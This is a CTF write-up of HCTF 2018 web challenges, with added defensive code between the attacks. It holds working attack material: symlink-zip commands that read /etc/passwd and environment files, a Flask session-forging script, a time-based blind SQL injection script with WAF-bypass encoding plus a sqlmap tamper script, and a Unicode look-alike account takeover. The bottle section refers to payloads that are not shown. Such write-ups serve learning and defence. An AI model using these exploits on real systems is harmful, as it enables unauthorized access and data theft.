HCTF 2018 writeup reproduction


1. bottle

After logging in, the site has a place to submit a URL.

Testing showed that the following payload works. Knowledge points: 1. CRLF injection; 2. if the redirect target carries a port number below 80, the browser does not follow the redirect, so the injected JS executes (the payload only runs in Firefox):

For the captcha, the MD5 values of 1-10000 can be generated in advance; the payload is constructed as follows:

The picture below shows my own cookie being captured. Submitting the same payload in the URL field, where the XSS bot runs, captures the admin's cookie:
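As an added example, not code from the writeup or from the bottle challenge, this is the server-side check that closes the CRLF hole: the user-supplied redirect target is validated before it is placed in a Location header. The allow-listed host and the sample URLs are constructed for the demo.

```python
# Added example (not part of the original writeup): validating a user-supplied
# redirect target before it goes into a Location header. Assumes the
# application only ever needs to redirect to an allow-listed set of hosts.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com"}  # constructed allow-list for the demo


def validate_redirect_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return the URL if it is safe to emit in a Location header, else None."""
    if not isinstance(url, str) or len(url) > 2048:
        return None
    # Reject CR, LF and every other control character on the RAW string before
    # parsing: urlsplit() silently strips \r, \n and \t (Python 3.9.5 and later),
    # so a check done after parsing would miss a header-injection attempt.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        return None
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.hostname not in allowed_hosts:
        return None
    # Only the well-known ports: a redirect to an odd port is never legitimate
    # here, and it is exactly the trick the writeup relies on.
    if port is not None and port not in (80, 443):
        return None
    return url


if __name__ == "__main__":
    samples = [  # constructed inputs
        "http://example.com/home",
        "http://example.com/\r\nSet-Cookie: sid=evil",
        "http://example.com:1/",
        "javascript:alert(1)",
        "http://attacker.invalid/",
    ]
    for s in samples:
        verdict = "allowed" if validate_redirect_target(s) else "rejected"
        print(repr(s), "->", verdict)
```

The control-character check runs on the raw string on purpose: the URL parser is lenient about `\r` and `\n`, so validating its output instead of its input is what lets a crafted URL through.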

2. hide and seek

Symlink vulnerability:

ln -s /etc/passwd 1.txt
zip -y 1.zip 1.txt

Uploading this archive returns the contents of /etc/passwd.

ln -s /proc/self/environ 1.txt
zip -y 1.zip 1.txt

This returns the configuration (the process environment).

ln -s /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py 1.txt
zip -y 1.zip 1.txt

Uploading 1.zip returns the source code.
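As an added example, not code from the writeup or from the challenge, this is the extractor that blocks the `ln -s target; zip -y` trick: it refuses any entry whose Unix mode marks it as a symlink and any entry whose path resolves outside the destination. The archives it checks are built in memory and are constructed for the demo.

```python
# Added example (not part of the original writeup): a zip extractor that
# refuses symlink entries and path escapes. Builds its own test archives.
import io
import os
import stat
import tempfile
import zipfile


class UnsafeArchiveEntry(Exception):
    pass


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    # Unix mode bits live in the high 16 bits of external_attr; zip -y stores
    # the link with S_IFLNK set there and the link target as the file data.
    mode = info.external_attr >> 16
    return stat.S_ISLNK(mode)


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Extract only regular files and dirs; raise on symlinks or path escape."""
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink_entry(info):
                raise UnsafeArchiveEntry(f"symlink entry: {info.filename}")
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise UnsafeArchiveEntry(f"path escapes destination: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def build_archive(name: str, data: bytes, symlink: bool) -> bytes:
    """Constructed sample: a one-entry zip, optionally stored as a symlink."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(name)
        if symlink:
            info.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(info, data)
    return buf.getvalue()


def demo() -> dict:
    """Return which constructed archives were accepted or rejected."""
    cases = {
        "regular": build_archive("1.txt", b"hello", symlink=False),
        "symlink": build_archive("1.txt", b"/etc/passwd", symlink=True),
        "traversal": build_archive("../1.txt", b"x", symlink=False),
    }
    results = {}
    for label, blob in cases.items():
        with tempfile.TemporaryDirectory() as d:
            try:
                safe_extract(blob, d)
                results[label] = "accepted"
            except UnsafeArchiveEntry as e:
                results[label] = f"rejected ({e})"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:10s} {v}")
```

The symlink check looks at the entry's mode bits rather than at the file data, because the data of a symlink entry is just the target path and looks like any other short text file.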

When the Flask secret_key is known, the admin session can be forged. The key is generated in the application like this (imports added for completeness):

import random
import uuid
from flask import Flask

random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)

This gives secret_key = 11.935137566861131

Script to forge the admin session:

from hashlib import sha1
from itsdangerous import URLSafeTimedSerializer


def session_serializer(secret_key):
    # Same signer settings Flask uses for its session cookie
    signer_kwargs = dict(
        key_derivation='hmac',
        digest_method=sha1
    )
    serializer = URLSafeTimedSerializer(secret_key, salt='cookie-session',
                                        signer_kwargs=signer_kwargs)
    data = {'username': 'admin'}
    return serializer.dumps(data)


if __name__ == '__main__':
    secret_key = '11.935137566861131'
    print(session_serializer(secret_key))

The cookie is split by "." into three parts: the serialized payload, the timestamp, and the tamper-proof signature. https://www.aliyun.com/jiaocheng/491548.html
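As an added example, not code from the writeup, from Flask or from itsdangerous, this is the server side of that cookie written with the standard library only, so the three parts can be inspected and the verification step (signature check, then age check) is explicit. It follows the layout of itsdangerous' URLSafeTimedSerializer as Flask configures it (HMAC-SHA1, key derived as HMAC(secret, salt), uncompressed payloads only) but is a re-implementation, and real code should use the library. The weak key function reproduces the challenge's derivation with the MAC address passed in explicitly; `strong_secret_key` is the corrected setting.

```python
# Added example (not part of the original writeup): sign/verify for a
# "payload.timestamp.signature" session cookie, plus weak vs strong key setup.
import base64
import hashlib
import hmac
import json
import random
import secrets
import time
import uuid

SALT = b"cookie-session"  # the salt Flask uses for its session cookie


def b64(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def derive_key(secret_key: str) -> bytes:
    # key_derivation='hmac': the signing key is HMAC(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret_key: str, now: int = None) -> str:
    """Build payload.timestamp.signature (what the server sends)."""
    payload = b64(json.dumps(data, separators=(",", ":")).encode())
    ts = int(time.time() if now is None else now)
    stamp = b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = payload + b"." + stamp
    sig = b64(hmac.new(derive_key(secret_key), value, hashlib.sha1).digest())
    return (value + b"." + sig).decode()


def verify_session(cookie: str, secret_key: str, max_age: int = 3600,
                   now: int = None):
    """Return the session dict, or None if the signature or the age is bad."""
    try:
        payload, stamp, sig = cookie.encode().rsplit(b".", 2)
    except ValueError:
        return None
    value = payload + b"." + stamp
    expected = b64(hmac.new(derive_key(secret_key), value, hashlib.sha1).digest())
    if not hmac.compare_digest(sig, expected):   # constant-time comparison first
        return None
    ts = int.from_bytes(b64d(stamp), "big")
    current = int(time.time() if now is None else now)
    if current - ts > max_age:
        return None
    return json.loads(b64d(payload))


def weak_secret_key(node: int) -> str:
    # The challenge's derivation: seeded from the MAC address, so anyone who
    # learns that address can recompute the key. Node passed in explicitly so
    # the result is deterministic for the demo.
    random.seed(node)
    return str(random.random() * 100)


def strong_secret_key() -> str:
    # 256 bits from the OS CSPRNG, stored in configuration, never derived.
    return secrets.token_hex(32)


if __name__ == "__main__":
    key = "11.935137566861131"          # value from the writeup
    cookie = sign_session({"username": "admin"}, key)
    print("parts:", cookie.split("."))
    print("verifies with the weak key:", verify_session(cookie, key))
    print("verifies with another key:", verify_session(cookie, strong_secret_key()))
    print("this machine's weak key would be:", weak_secret_key(uuid.getnode()))
```

Because the signature covers the payload and the timestamp together, swapping in a different payload under the same signature fails, and so does any cookie older than `max_age`; the only thing the scheme cannot defend against is a secret that is guessable, which is the whole of the challenge.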

3. kzone: knowledge points learned

json_decode parses Unicode escapes such as \u0020, which can be used to get past the WAF.

If the injection has to be case-sensitive, use binary to tell the cases apart.

Script:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# xishir
import requests
import time

# hctf{4526a8cbd741b3f790f95ad32c2514b9}

# alphabet tried at every position of the flag
ss = "{}_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-+"
r = requests.session()
url = "http://kzone.2018.hctf.io/admin/"
#url="http://127.0.0.1/hctf/www/admin/"

# Raw strings so that the six literal characters \u00XX are sent as-is and only
# json_decode on the server turns them back into the keyword letter (in a
# normal Python 3 string '\u00' on its own is a syntax error).
union = r'\u00' + hex(ord('u'))[2:] + 'nion'
sleep = r'\u00' + hex(ord('s'))[2:] + 'leep'
ascii = r'\u00' + hex(ord('a'))[2:] + 'scii'
ok = r'\u00' + hex(ord('='))[2:]
substr = r'\u00' + hex(ord('s'))[2:] + 'ubstr'
over = r'\u00' + hex(ord('#'))[2:]
blank = "/**/"
orr = r'\u00' + hex(ord('o'))[2:] + 'r'

flag = ""
for i in range(1, 50):
    print(i)
    for j in ss:
        # time-based blind injection: the response is delayed only when the
        # i-th character of the flag equals j
        payload = ("admin' and (substr((select binary F1a9 from F1444g limit 1),"
                   + str(i) + ",1)='" + str(j) + "') and sleep(4) and 1='1")

        payload = payload.replace('sleep', sleep)
        payload = payload.replace('union', union)
        payload = payload.replace('=', ok)
        payload = payload.replace('#', over)
        payload = payload.replace(' ', blank)
        payload = payload.replace('ascii', ascii)
        payload = payload.replace('substr', substr)
        payload = payload.replace('or', orr)

        jsons = ('{"admin_user":"' + payload
                 + '","admin_pass":"3b30a11aaba222edd6e704e9959b94643ed4ffd9"}')

        cookie = {"PHPSESSID": "t0k91etf5fecbi4t25d7hprtm3",
                  "islogin": "1",
                  "login_data": jsons}

        t1 = time.time()
        r1 = r.get("http://kzone.2018.hctf.io", cookies=cookie)
        t2 = time.time()
        if (t2 - t1) > 4:
            flag += str(j)
            print(i, flag)
            break
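As an added example, not code from the writeup or from the challenge, this shows the defensive side of the two knowledge points above: a keyword filter applied to the raw cookie never sees `\u0073leep`, the same filter applied after json_decode does, and a parameterized query removes the question entirely. The cookie is constructed in the writeup's format, and an in-memory SQLite table stands in for the challenge's MySQL schema (the table and column names are assumptions).

```python
# Added example (not part of the original writeup): inspect-after-decode and
# parameterized lookup for the login_data cookie. SQLite is a stand-in here.
import json
import re
import sqlite3

KEYWORD_RE = re.compile(r"\b(union|select|sleep|substr|ascii|or|and)\b", re.I)


def raw_filter_hits(raw_cookie: str) -> bool:
    """Naive WAF: keyword scan on the cookie bytes as received."""
    return bool(KEYWORD_RE.search(raw_cookie))


def decoded_filter_hits(raw_cookie: str) -> bool:
    """Same scan, but on the values the application will actually use."""
    try:
        data = json.loads(raw_cookie)
    except ValueError:
        return True   # malformed JSON: reject rather than guess
    return any(isinstance(v, str) and KEYWORD_RE.search(v) for v in data.values())


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'not-the-real-hash')")  # constructed row
    return conn


def lookup_parameterized(conn, username: str, password: str):
    """Fixed query: the user-controlled values travel as bound parameters."""
    cur = conn.execute(
        "SELECT username FROM admin WHERE username = ? AND password = ?",
        (username, password),
    )
    return cur.fetchone()


# Constructed cookie in the writeup's format: keyword letters are sent as
# \u00XX escapes, so a byte-level filter never sees the words themselves.
COOKIE = (r'{"admin_user":"admin\u0027 \u0061nd \u0073leep(4) \u0061nd 1\u003d\u00271",'
          r'"admin_pass":"x"}')


def demo() -> dict:
    conn = make_db()
    data = json.loads(COOKIE)
    return {
        "raw_filter_sees_keyword": raw_filter_hits(COOKIE),
        "decoded_filter_sees_keyword": decoded_filter_hits(COOKIE),
        "decoded_user": data["admin_user"],
        "parameterized_row": lookup_parameterized(conn, data["admin_user"], data["admin_pass"]),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The order matters: any inspection has to run on the same representation the query will be built from, which is the value after json_decode, not the cookie as it crossed the wire. With a bound parameter the decoded string is compared as data, so the `sleep(4)` never reaches the SQL parser.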

For the injection with sqlmap, see flagpig's article: https://xz.aliyun.com/t/3245#toc-4

Request saved in a.txt (the injection point is marked with *):

POST /admin/list.php HTTP/1.1
Host: kzone.2018.hctf.io
Content-Length: 33
Cache-Control: max-age=0
Origin: http://kzone.2018.hctf.io
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://kzone.2018.hctf.io/admin/login.php
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.741104145.1542009847; _gid=GA1.2.1399152972.1542009847; PHPSESSID=07hcqdlsdk80c1o2bgjp5r32e3;; islogin=1; login_data=*
Connection: close

user=11111&pass=11111&login=Login

Put the hctf.py script in the tamper directory:

#!/usr/bin/env python
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    # Wrap the injected value in the login_data JSON the site expects. Raw
    # strings keep the \u00XX escapes literal (under Python 3 a plain
    # '\u0075' would already be the letter u) so that only the server's
    # json_decode turns them back into the filtered characters.
    data = '''{"admin_user":"admin%s","admin_pass":65};'''
    payload = payload.lower()
    payload = payload.replace('u', r'\u0075')
    payload = payload.replace('o', r'\u006f')
    payload = payload.replace('i', r'\u0069')
    payload = payload.replace('\'', r'\u0027')
    payload = payload.replace('"', r'\u0022')
    payload = payload.replace(' ', r'\u0020')
    payload = payload.replace('s', r'\u0073')
    payload = payload.replace('#', r'\u0023')
    payload = payload.replace('>', r'\u003e')
    payload = payload.replace('<', r'\u003c')
    payload = payload.replace('-', r'\u002d')
    payload = payload.replace('=', r'\u003d')
    payload = payload.replace('f1', 'F1')   # restore the case of F1a9/F1444g after lower()
    return data % payload

sqlmap -r a.txt --tamper=hctf --dbms=mysql --threads=10 --technique=B --not-string="window.location" -v3 -D hctf_kouzone -T F1444g -C F1a9 --dump

This dumps the data.

https://www.anquanke.com/post/id/163958

4. admin

This one can also be solved by forging the Flask admin session: https://www.anquanke.com/post/id/164086

The username is run through nodeprep (assumed to be Twisted's nodeprep profile; import added here):

from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep


def strlower(username):
    username = nodeprep.prepare(username)
    return username

Unicode security issue:

http://blog.lnyas.xyz/?p=1411

Register an account named ᴬdmin
Log in as ᴬdmin; the page shows Admin
Change the password and log out
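As an added example, not code from the writeup or from the challenge, this is the registration-side check that closes the look-alike account problem: every username is reduced to one canonical form, that form must be a fixed point of the canonicalisation (so applying it again at login or at a password change cannot land on a different account), and a name whose canonical form is already taken is refused. The challenge used a stringprep nodeprep profile; here NFKC plus casefold from the standard library stands in for it, which is an assumption, and it maps U+1D2C (ᴬ) to a plain "a" in the same way.

```python
# Added example (not part of the original writeup): canonical usernames with
# a collision check at registration. NFKC + casefold stands in for nodeprep.
import unicodedata


def canonical_username(name: str) -> str:
    """One canonical form: compatibility-normalise, then casefold."""
    return unicodedata.normalize("NFKC", name).casefold()


class UserStore:
    def __init__(self):
        self._users = {}          # canonical name -> display name as registered

    def register(self, name: str) -> bool:
        canon = canonical_username(name)
        # Refuse a name whose canonical form is already taken, and a name whose
        # canonical form is not stable under a second pass: both let a later
        # normalisation step resolve to someone else's account.
        if canon in self._users or canonical_username(canon) != canon:
            return False
        self._users[canon] = name
        return True

    def lookup(self, name: str):
        """Resolve any spelling to the registered display name, or None."""
        return self._users.get(canonical_username(name))


def demo() -> dict:
    store = UserStore()
    lookalike = "\u1d2cdmin"      # "ᴬdmin", the name from the writeup
    return {
        "admin": store.register("admin"),
        "lookalike": store.register(lookalike),
        "canonical_of_lookalike": canonical_username(lookalike),
        "resolves_to": store.lookup(lookalike),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Note that `casefold()` alone leaves U+1D2C untouched, because it has no case mapping; it is the compatibility decomposition in NFKC that turns the modifier letter into "A". A store that lowercases without normalising, or normalises in one handler but not another, is exactly what produces two accounts that agree on some pages and disagree on others.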

References:

https://www.jianshu.com/p/8f5ba751aa0f

https://xz.aliyun.com/t/3255#toc-7

http://wiki.ioin.in/post/group/18NJ

